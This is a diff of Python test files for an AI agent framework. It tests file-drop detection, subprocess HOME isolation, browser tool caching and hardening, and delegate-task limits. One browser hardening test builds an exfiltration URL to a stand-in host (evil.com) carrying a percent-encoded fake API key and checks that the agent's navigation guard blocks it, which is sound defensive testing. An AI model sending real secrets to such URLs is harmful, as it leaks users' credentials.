assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["arguments"]
|
||||
|
||||
def test_ascii_codec_strips_all_non_ascii(self):
|
||||
"""ASCII codec case: all non-ASCII is stripped, not replaced."""
|
||||
messages = [{"role": "user", "content": "test ⚕🤖你好 end"}]
|
||||
assert _sanitize_messages_non_ascii(messages) is True
|
||||
# All non-ASCII chars removed; spaces around them collapse
|
||||
assert messages[0]["content"] == "test end"
|
||||
|
||||
def test_no_surrogates_returns_false(self):
|
||||
"""When no surrogates present, _sanitize_messages_surrogates returns False."""
|
||||
messages = [{"role": "user", "content": "hello ⚕ world"}]
|
||||
assert _sanitize_messages_surrogates(messages) is False
|
||||
@@ -0,0 +1,176 @@
|
||||
"""Tests for _detect_file_drop — file path detection that prevents
|
||||
dragged/pasted absolute paths from being mistaken for slash commands."""
|
||||
|
||||
import os
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from cli import _detect_file_drop
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fixtures
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_image(tmp_path):
|
||||
"""Create a temporary .png file and return its path."""
|
||||
img = tmp_path / "screenshot.png"
|
||||
img.write_bytes(b"\x89PNG\r\n\x1a\n") # minimal PNG header
|
||||
return img
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_text(tmp_path):
|
||||
"""Create a temporary .py file and return its path."""
|
||||
f = tmp_path / "main.py"
|
||||
f.write_text("print('hello')\n")
|
||||
return f
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def tmp_image_with_spaces(tmp_path):
|
||||
"""Create a file whose name contains spaces (like macOS screenshots)."""
|
||||
img = tmp_path / "Screenshot 2026-04-01 at 7.25.32 PM.png"
|
||||
img.write_bytes(b"\x89PNG\r\n\x1a\n")
|
||||
return img
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: returns None for non-file inputs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestNonFileInputs:
|
||||
def test_regular_slash_command(self):
|
||||
assert _detect_file_drop("/help") is None
|
||||
|
||||
def test_unknown_slash_command(self):
|
||||
assert _detect_file_drop("/xyz") is None
|
||||
|
||||
def test_slash_command_with_args(self):
|
||||
assert _detect_file_drop("/config set key value") is None
|
||||
|
||||
def test_empty_string(self):
|
||||
assert _detect_file_drop("") is None
|
||||
|
||||
def test_non_slash_input(self):
|
||||
assert _detect_file_drop("hello world") is None
|
||||
|
||||
def test_non_string_input(self):
|
||||
assert _detect_file_drop(42) is None
|
||||
|
||||
def test_nonexistent_path(self):
|
||||
assert _detect_file_drop("/nonexistent/path/to/file.png") is None
|
||||
|
||||
def test_directory_not_file(self, tmp_path):
|
||||
"""A directory path should not be treated as a file drop."""
|
||||
assert _detect_file_drop(str(tmp_path)) is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: image file detection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestImageFileDrop:
|
||||
def test_simple_image_path(self, tmp_image):
|
||||
result = _detect_file_drop(str(tmp_image))
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image
|
||||
assert result["is_image"] is True
|
||||
assert result["remainder"] == ""
|
||||
|
||||
def test_image_with_trailing_text(self, tmp_image):
|
||||
user_input = f"{tmp_image} analyze this please"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image
|
||||
assert result["is_image"] is True
|
||||
assert result["remainder"] == "analyze this please"
|
||||
|
||||
@pytest.mark.parametrize("ext", [".png", ".jpg", ".jpeg", ".gif", ".webp",
|
||||
".bmp", ".tiff", ".tif", ".svg", ".ico"])
|
||||
def test_all_image_extensions(self, tmp_path, ext):
|
||||
img = tmp_path / f"test{ext}"
|
||||
img.write_bytes(b"fake")
|
||||
result = _detect_file_drop(str(img))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
|
||||
def test_uppercase_extension(self, tmp_path):
|
||||
img = tmp_path / "photo.JPG"
|
||||
img.write_bytes(b"fake")
|
||||
result = _detect_file_drop(str(img))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: non-image file detection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestNonImageFileDrop:
|
||||
def test_python_file(self, tmp_text):
|
||||
result = _detect_file_drop(str(tmp_text))
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_text
|
||||
assert result["is_image"] is False
|
||||
assert result["remainder"] == ""
|
||||
|
||||
def test_non_image_with_trailing_text(self, tmp_text):
|
||||
user_input = f"{tmp_text} review this code"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
assert result["remainder"] == "review this code"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: backslash-escaped spaces (macOS drag-and-drop)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEscapedSpaces:
|
||||
def test_escaped_spaces_in_path(self, tmp_image_with_spaces):
|
||||
r"""macOS drags produce paths like /path/to/my\ file.png"""
|
||||
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
|
||||
result = _detect_file_drop(escaped)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image_with_spaces
|
||||
assert result["is_image"] is True
|
||||
|
||||
def test_escaped_spaces_with_trailing_text(self, tmp_image_with_spaces):
|
||||
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
|
||||
user_input = f"{escaped} what is this?"
|
||||
result = _detect_file_drop(user_input)
|
||||
assert result is not None
|
||||
assert result["path"] == tmp_image_with_spaces
|
||||
assert result["remainder"] == "what is this?"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests: edge cases
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEdgeCases:
|
||||
def test_path_with_no_extension(self, tmp_path):
|
||||
f = tmp_path / "Makefile"
|
||||
f.write_text("all:\n\techo hi\n")
|
||||
result = _detect_file_drop(str(f))
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
|
||||
def test_path_that_looks_like_command_but_is_file(self, tmp_path):
|
||||
"""A file literally named 'help' inside a directory starting with /."""
|
||||
f = tmp_path / "help"
|
||||
f.write_text("not a command\n")
|
||||
result = _detect_file_drop(str(f))
|
||||
assert result is not None
|
||||
assert result["is_image"] is False
|
||||
|
||||
def test_symlink_to_file(self, tmp_image, tmp_path):
|
||||
link = tmp_path / "link.png"
|
||||
link.symlink_to(tmp_image)
|
||||
result = _detect_file_drop(str(link))
|
||||
assert result is not None
|
||||
assert result["is_image"] is True
|
||||
@@ -0,0 +1,198 @@
|
||||
"""Tests for per-profile subprocess HOME isolation (#4426).
|
||||
|
||||
Verifies that subprocesses (terminal, execute_code, background processes)
|
||||
receive a per-profile HOME directory while the Python process's own HOME
|
||||
and Path.home() remain unchanged.
|
||||
|
||||
See: https://github.com/NousResearch/hermes-agent/issues/4426
|
||||
"""
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# get_subprocess_home()
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestGetSubprocessHome:
|
||||
"""Unit tests for hermes_constants.get_subprocess_home()."""
|
||||
|
||||
def test_returns_none_when_hermes_home_unset(self, monkeypatch):
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() is None
|
||||
|
||||
def test_returns_none_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
# No home/ subdirectory created
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() is None
|
||||
|
||||
def test_returns_path_when_home_dir_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
profile_home = hermes_home / "home"
|
||||
profile_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() == str(profile_home)
|
||||
|
||||
def test_returns_profile_specific_path(self, tmp_path, monkeypatch):
|
||||
"""Named profiles get their own isolated HOME."""
|
||||
profile_dir = tmp_path / ".hermes" / "profiles" / "coder"
|
||||
profile_dir.mkdir(parents=True)
|
||||
profile_home = profile_dir / "home"
|
||||
profile_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
|
||||
from hermes_constants import get_subprocess_home
|
||||
assert get_subprocess_home() == str(profile_home)
|
||||
|
||||
def test_two_profiles_get_different_homes(self, tmp_path, monkeypatch):
|
||||
base = tmp_path / ".hermes" / "profiles"
|
||||
for name in ("alpha", "beta"):
|
||||
p = base / name
|
||||
p.mkdir(parents=True)
|
||||
(p / "home").mkdir()
|
||||
|
||||
from hermes_constants import get_subprocess_home
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(base / "alpha"))
|
||||
home_a = get_subprocess_home()
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(base / "beta"))
|
||||
home_b = get_subprocess_home()
|
||||
|
||||
assert home_a != home_b
|
||||
assert home_a.endswith("alpha/home")
|
||||
assert home_b.endswith("beta/home")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _make_run_env() injection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestMakeRunEnvHomeInjection:
|
||||
"""Verify _make_run_env() injects HOME into subprocess envs."""
|
||||
|
||||
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
monkeypatch.setenv("HOME", "/root")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == str(hermes_home / "home")
|
||||
|
||||
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
# No home/ subdirectory
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
monkeypatch.setenv("HOME", "/root")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == "/root"
|
||||
|
||||
def test_no_injection_when_hermes_home_unset(self, monkeypatch):
|
||||
monkeypatch.delenv("HERMES_HOME", raising=False)
|
||||
monkeypatch.setenv("HOME", "/home/user")
|
||||
monkeypatch.setenv("PATH", "/usr/bin:/bin")
|
||||
|
||||
from tools.environments.local import _make_run_env
|
||||
result = _make_run_env({})
|
||||
|
||||
assert result["HOME"] == "/home/user"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _sanitize_subprocess_env() injection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSanitizeSubprocessEnvHomeInjection:
|
||||
"""Verify _sanitize_subprocess_env() injects HOME for background procs."""
|
||||
|
||||
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
base_env = {"HOME": "/root", "PATH": "/usr/bin", "USER": "root"}
|
||||
from tools.environments.local import _sanitize_subprocess_env
|
||||
result = _sanitize_subprocess_env(base_env)
|
||||
|
||||
assert result["HOME"] == str(hermes_home / "home")
|
||||
|
||||
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
base_env = {"HOME": "/root", "PATH": "/usr/bin"}
|
||||
from tools.environments.local import _sanitize_subprocess_env
|
||||
result = _sanitize_subprocess_env(base_env)
|
||||
|
||||
assert result["HOME"] == "/root"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Profile bootstrap
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestProfileBootstrap:
|
||||
"""Verify new profiles get a home/ subdirectory."""
|
||||
|
||||
def test_profile_dirs_includes_home(self):
|
||||
from hermes_cli.profiles import _PROFILE_DIRS
|
||||
assert "home" in _PROFILE_DIRS
|
||||
|
||||
def test_create_profile_bootstraps_home_dir(self, tmp_path, monkeypatch):
|
||||
"""create_profile() should create home/ inside the profile dir."""
|
||||
home = tmp_path / ".hermes"
|
||||
home.mkdir()
|
||||
monkeypatch.setattr(Path, "home", lambda: tmp_path)
|
||||
monkeypatch.setenv("HERMES_HOME", str(home))
|
||||
|
||||
from hermes_cli.profiles import create_profile
|
||||
profile_dir = create_profile("testbot", no_alias=True)
|
||||
assert (profile_dir / "home").is_dir()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Python process HOME unchanged
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestPythonProcessUnchanged:
|
||||
"""Confirm the Python process's own HOME is never modified."""
|
||||
|
||||
def test_path_home_unchanged_after_subprocess_home_resolved(
|
||||
self, tmp_path, monkeypatch
|
||||
):
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / "home").mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
original_home = os.environ.get("HOME")
|
||||
original_path_home = str(Path.home())
|
||||
|
||||
from hermes_constants import get_subprocess_home
|
||||
sub_home = get_subprocess_home()
|
||||
|
||||
# Subprocess home is set but Python HOME stays the same
|
||||
assert sub_home is not None
|
||||
assert os.environ.get("HOME") == original_home
|
||||
assert str(Path.home()) == original_path_home
|
||||
@@ -0,0 +1,271 @@
|
||||
"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation."""
|
||||
|
||||
import inspect
|
||||
import os
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _reset_caches():
|
||||
"""Reset all module-level caches so tests start clean."""
|
||||
import tools.browser_tool as bt
|
||||
bt._cached_agent_browser = None
|
||||
bt._agent_browser_resolved = False
|
||||
bt._cached_command_timeout = None
|
||||
bt._command_timeout_resolved = False
|
||||
# lru_cache for _discover_homebrew_node_dirs
|
||||
if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"):
|
||||
bt._discover_homebrew_node_dirs.cache_clear()
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clean_caches():
|
||||
_reset_caches()
|
||||
yield
|
||||
_reset_caches()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Dead code removal
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestDeadCodeRemoval:
|
||||
"""Verify dead code was actually removed."""
|
||||
|
||||
def test_no_default_session_timeout(self):
|
||||
import tools.browser_tool as bt
|
||||
assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT")
|
||||
|
||||
def test_browser_close_schema_removed(self):
|
||||
from tools.browser_tool import BROWSER_TOOL_SCHEMAS
|
||||
names = [s["name"] for s in BROWSER_TOOL_SCHEMAS]
|
||||
assert "browser_close" not in names
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _find_agent_browser
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestFindAgentBrowserCache:
|
||||
|
||||
def test_cached_after_first_call(self):
|
||||
import tools.browser_tool as bt
|
||||
with patch("shutil.which", return_value="/usr/bin/agent-browser"):
|
||||
result1 = bt._find_agent_browser()
|
||||
result2 = bt._find_agent_browser()
|
||||
assert result1 == result2 == "/usr/bin/agent-browser"
|
||||
assert bt._agent_browser_resolved is True
|
||||
|
||||
def test_cache_cleared_by_cleanup(self):
|
||||
import tools.browser_tool as bt
|
||||
bt._cached_agent_browser = "/fake/path"
|
||||
bt._agent_browser_resolved = True
|
||||
bt.cleanup_all_browsers()
|
||||
assert bt._agent_browser_resolved is False
|
||||
|
||||
def test_not_found_cached_raises_on_subsequent(self):
|
||||
"""After FileNotFoundError, subsequent calls should raise from cache."""
|
||||
import tools.browser_tool as bt
|
||||
from pathlib import Path
|
||||
|
||||
original_exists = Path.exists
|
||||
|
||||
def mock_exists(self):
|
||||
if "node_modules" in str(self) and "agent-browser" in str(self):
|
||||
return False
|
||||
return original_exists(self)
|
||||
|
||||
with patch("shutil.which", return_value=None), \
|
||||
patch("os.path.isdir", return_value=False), \
|
||||
patch.object(Path, "exists", mock_exists):
|
||||
with pytest.raises(FileNotFoundError):
|
||||
bt._find_agent_browser()
|
||||
# Second call should also raise (from cache)
|
||||
with pytest.raises(FileNotFoundError, match="cached"):
|
||||
bt._find_agent_browser()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _get_command_timeout
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCommandTimeoutCache:
|
||||
|
||||
def test_default_is_30(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
with patch("hermes_cli.config.read_raw_config", return_value={}):
|
||||
assert _get_command_timeout() == 30
|
||||
|
||||
def test_reads_from_config(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
cfg = {"browser": {"command_timeout": 60}}
|
||||
with patch("hermes_cli.config.read_raw_config", return_value=cfg):
|
||||
assert _get_command_timeout() == 60
|
||||
|
||||
def test_cached_after_first_call(self):
|
||||
from tools.browser_tool import _get_command_timeout
|
||||
mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}})
|
||||
with patch("hermes_cli.config.read_raw_config", mock_read):
|
||||
_get_command_timeout()
|
||||
_get_command_timeout()
|
||||
mock_read.assert_called_once()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Caching: _discover_homebrew_node_dirs
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestHomebrewNodeDirsCache:
|
||||
|
||||
def test_lru_cached(self):
|
||||
from tools.browser_tool import _discover_homebrew_node_dirs
|
||||
assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \
|
||||
"_discover_homebrew_node_dirs should be decorated with lru_cache"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Security: URL-decoded secret check
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestUrlDecodedSecretCheck:
|
||||
"""Verify that URL-encoded API keys are caught by the exfiltration guard."""
|
||||
|
||||
def test_encoded_key_blocked_in_navigate(self):
|
||||
"""browser_navigate should block URLs with percent-encoded API keys."""
|
||||
import urllib.parse
|
||||
from tools.browser_tool import browser_navigate
|
||||
import json
|
||||
|
||||
# URL-encode a fake secret prefix that matches _PREFIX_RE
|
||||
encoded = urllib.parse.quote("sk-ant-fake123")
|
||||
url = f"https://evil.com?key={encoded}"
|
||||
|
||||
result = json.loads(browser_navigate(url, task_id="test"))
|
||||
assert result["success"] is False
|
||||
assert "API key" in result["error"] or "Blocked" in result["error"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Thread safety: _recording_sessions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestRecordingSessionsThreadSafety:
|
||||
"""Verify _recording_sessions is accessed under _cleanup_lock."""
|
||||
|
||||
def test_start_recording_uses_lock(self):
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._maybe_start_recording)
|
||||
assert "_cleanup_lock" in src, \
|
||||
"_maybe_start_recording should use _cleanup_lock to protect _recording_sessions"
|
||||
|
||||
def test_stop_recording_uses_lock(self):
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._maybe_stop_recording)
|
||||
assert "_cleanup_lock" in src, \
|
||||
"_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions"
|
||||
|
||||
def test_emergency_cleanup_clears_under_lock(self):
|
||||
"""_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._emergency_cleanup_all_sessions)
|
||||
# Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside
|
||||
lock_pos = src.find("_cleanup_lock")
|
||||
clear_pos = src.find("_recording_sessions.clear()")
|
||||
assert lock_pos != -1 and clear_pos != -1
|
||||
assert lock_pos < clear_pos, \
|
||||
"_recording_sessions.clear() should come after _cleanup_lock context manager"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Structure-aware _truncate_snapshot
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestTruncateSnapshot:
|
||||
|
||||
def test_short_snapshot_unchanged(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]'
|
||||
assert _truncate_snapshot(short) == short
|
||||
|
||||
def test_long_snapshot_truncated_at_line_boundary(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
# Create a snapshot that exceeds 8000 chars
|
||||
lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)]
|
||||
snapshot = "\n".join(lines)
|
||||
assert len(snapshot) > 8000
|
||||
|
||||
result = _truncate_snapshot(snapshot, max_chars=200)
|
||||
assert len(result) <= 300 # some margin for the truncation note
|
||||
assert "truncated" in result.lower()
|
||||
# Every line in the result should be complete (not cut mid-element)
|
||||
for line in result.split("\n"):
|
||||
if line.strip() and "truncated" not in line.lower():
|
||||
assert line.startswith("- item") or line == ""
|
||||
|
||||
def test_truncation_reports_remaining_count(self):
|
||||
from tools.browser_tool import _truncate_snapshot
|
||||
lines = [f"- line {i}" for i in range(100)]
|
||||
snapshot = "\n".join(lines)
|
||||
result = _truncate_snapshot(snapshot, max_chars=200)
|
||||
# Should mention how many lines were truncated
|
||||
assert "more line" in result.lower()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Scroll optimization
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestScrollOptimization:
|
||||
|
||||
def test_agent_browser_path_uses_pixel_scroll(self):
|
||||
"""Verify agent-browser path uses single pixel-based scroll, not 5x loop."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt.browser_scroll)
|
||||
assert "_SCROLL_PIXELS" in src, \
|
||||
"browser_scroll should use _SCROLL_PIXELS for agent-browser path"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Empty stdout = failure
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEmptyStdoutFailure:
|
||||
|
||||
def test_empty_stdout_returns_failure(self):
|
||||
"""Verify _run_browser_command returns failure on empty stdout."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._run_browser_command)
|
||||
assert "returned no output" in src, \
|
||||
"_run_browser_command should treat empty stdout as failure"
|
||||
|
||||
def test_empty_ok_commands_is_module_level_frozenset(self):
|
||||
"""_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function."""
|
||||
import tools.browser_tool as bt
|
||||
assert hasattr(bt, "_EMPTY_OK_COMMANDS")
|
||||
assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset)
|
||||
assert "close" in bt._EMPTY_OK_COMMANDS
|
||||
assert "record" in bt._EMPTY_OK_COMMANDS
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _camofox_eval bug fix
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCamofoxEvalFix:
|
||||
|
||||
def test_uses_correct_ensure_tab_signature(self):
|
||||
"""_camofox_eval should pass task_id string to _ensure_tab, not a session dict."""
|
||||
import tools.browser_tool as bt
|
||||
src = inspect.getsource(bt._camofox_eval)
|
||||
# Should NOT call _get_session at all — _ensure_tab handles it
|
||||
assert "_get_session" not in src, \
|
||||
"_camofox_eval should not call _get_session (removed unused import)"
|
||||
# Should use body= not json_data=
|
||||
assert "json_data=" not in src, \
|
||||
"_camofox_eval should use body= kwarg for _post, not json_data="
|
||||
assert "body=" in src
|
||||
@@ -15,6 +15,19 @@ from tools.browser_tool import (
|
||||
_SANE_PATH,
|
||||
check_browser_requirements,
|
||||
)
|
||||
import tools.browser_tool as _bt
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_browser_caches():
|
||||
"""Clear lru_cache and manual caches between tests."""
|
||||
_discover_homebrew_node_dirs.cache_clear()
|
||||
_bt._cached_agent_browser = None
|
||||
_bt._agent_browser_resolved = False
|
||||
yield
|
||||
_discover_homebrew_node_dirs.cache_clear()
|
||||
_bt._cached_agent_browser = None
|
||||
_bt._agent_browser_resolved = False
|
||||
|
||||
|
||||
class TestSanePath:
|
||||
@@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs:
|
||||
def test_returns_empty_when_no_homebrew(self):
|
||||
"""Non-macOS systems without /opt/homebrew/opt should return empty."""
|
||||
with patch("os.path.isdir", return_value=False):
|
||||
assert _discover_homebrew_node_dirs() == []
|
||||
assert _discover_homebrew_node_dirs() == ()
|
||||
|
||||
def test_finds_versioned_node_dirs(self):
|
||||
"""Should discover node@20/bin, node@24/bin etc."""
|
||||
@@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs:
|
||||
with patch("os.path.isdir", return_value=True), \
|
||||
patch("os.listdir", return_value=["node"]):
|
||||
result = _discover_homebrew_node_dirs()
|
||||
assert result == []
|
||||
assert result == ()
|
||||
|
||||
def test_handles_oserror_gracefully(self):
|
||||
"""Should return empty list if listdir raises OSError."""
|
||||
with patch("os.path.isdir", return_value=True), \
|
||||
patch("os.listdir", side_effect=OSError("Permission denied")):
|
||||
assert _discover_homebrew_node_dirs() == []
|
||||
assert _discover_homebrew_node_dirs() == ()
|
||||
|
||||
|
||||
class TestFindAgentBrowser:
|
||||
|
||||
@@ -13,13 +13,14 @@ import json
|
||||
import os
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import unittest
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from tools.delegate_tool import (
|
||||
DELEGATE_BLOCKED_TOOLS,
|
||||
DELEGATE_TASK_SCHEMA,
|
||||
MAX_CONCURRENT_CHILDREN,
|
||||
_get_max_concurrent_children,
|
||||
MAX_DEPTH,
|
||||
check_delegate_requirements,
|
||||
delegate_task,
|
||||
@@ -66,7 +67,7 @@ class TestDelegateRequirements(unittest.TestCase):
|
||||
self.assertIn("context", props)
|
||||
self.assertIn("toolsets", props)
|
||||
self.assertIn("max_iterations", props)
|
||||
self.assertEqual(props["tasks"]["maxItems"], 3)
|
||||
self.assertNotIn("maxItems", props["tasks"]) # removed — limit is now runtime-configurable
|
||||
|
||||
|
||||
class TestChildSystemPrompt(unittest.TestCase):
|
||||
@@ -167,10 +168,13 @@ class TestDelegateTask(unittest.TestCase):
|
||||
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
|
||||
}
|
||||
parent = _make_mock_parent()
|
||||
tasks = [{"goal": f"Task {i}"} for i in range(5)]
|
||||
limit = _get_max_concurrent_children()
|
||||
tasks = [{"goal": f"Task {i}"} for i in range(limit + 2)]
|
||||
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
|
||||
# Should only run 3 tasks (MAX_CONCURRENT_CHILDREN)
|
||||
self.assertEqual(mock_run.call_count, 3)
|
||||
# Should return an error instead of silently truncating
|
||||
self.assertIn("error", result)
|
||||
self.assertIn("Too many tasks", result["error"])
|
||||
mock_run.assert_not_called()
|
||||
|
||||
@patch("tools.delegate_tool._run_single_child")
|
||||
def test_batch_ignores_toplevel_goal(self, mock_run):
|
||||
@@ -561,7 +565,7 @@ class TestBlockedTools(unittest.TestCase):
|
||||
self.assertIn(tool, DELEGATE_BLOCKED_TOOLS)
|
||||
|
||||
def test_constants(self):
|
||||
self.assertEqual(MAX_CONCURRENT_CHILDREN, 3)
|
||||
self.assertEqual(_get_max_concurrent_children(), 3)
|
||||
self.assertEqual(MAX_DEPTH, 2)
|
||||
|
||||
|
||||
@@ -1052,5 +1056,159 @@ class TestChildCredentialLeasing(unittest.TestCase):
|
||||
child._credential_pool.release_lease.assert_called_once_with("cred-a")
|
||||
|
||||
|
||||
class TestDelegateHeartbeat(unittest.TestCase):
|
||||
"""Heartbeat propagates child activity to parent during delegation.
|
||||
|
||||
Without the heartbeat, the gateway inactivity timeout fires because the
|
||||
parent's _last_activity_ts freezes when delegate_task starts.
|
||||
"""
|
||||
|
||||
def test_heartbeat_touches_parent_activity_during_child_run(self):
|
||||
"""Parent's _touch_activity is called while child.run_conversation blocks."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": "terminal",
|
||||
"api_call_count": 3,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "executing tool: terminal",
|
||||
}
|
||||
|
||||
